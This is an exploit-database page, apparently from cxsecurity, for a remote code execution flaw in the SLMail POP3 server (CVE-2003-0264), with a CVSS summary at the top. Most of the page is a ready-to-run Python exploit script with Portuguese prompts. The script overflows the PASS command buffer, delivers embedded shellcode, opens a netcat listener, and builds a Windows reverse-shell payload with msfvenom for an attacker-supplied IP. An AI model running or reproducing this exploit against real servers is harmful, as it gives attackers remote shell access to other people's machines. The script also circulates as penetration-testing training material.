SLMail 5.1.0.4420 Remote Code Execution

2021.02.25
Credit: mednic
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# -*- coding: utf-8 -*- import socket from time import sleep from os import system system("clear") print 'Shell-code-foi-informada?\r\n' print '[1] sim' print '[2] nao\n' quest = int(input('>>> ')) def main(): system("clear") #============================ #--ensira-sua-shell-code-aqui buf = "" buf += "\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29" buf += "\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31" buf += "\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e" buf += "\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65" buf += "\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54" buf += "\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5" buf += "\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d" buf += "\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27" buf += "\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46" buf += "\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31" #=========================== print 'Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)' print '\nby: - Mednic -\r\n' host = raw_input('Host: ') buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 39 + buf s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sleep(3) print '\nIniciando conexão ao servidor...\n' sleep(2) try: s.connect((host, 110)) s.recv(1024) except: print 'Conexão recusada !' exit() s.settimeout(1) print '\nEnviando usuario...\n' s.send("USER guest\r\n") s.recv(1024) s.settimeout(1) print '\nIniciando estouro de buffer...\n' system('nc -nlvp 444') s.send("PASS "+buffer+"\r\n") s.recv(1024) s.send("QUIT\r\n") s.close() if quest == 1: main() elif quest == 2: print "IP para conexão reversa !" ip = raw_input('>>> ') system('clear') system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'\\x00\\x0a\\x0d\\x20'+" -f python") print '\r\nCopie e substitua pelo setado no codigo !' else: print 'Invalido argumento' exit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top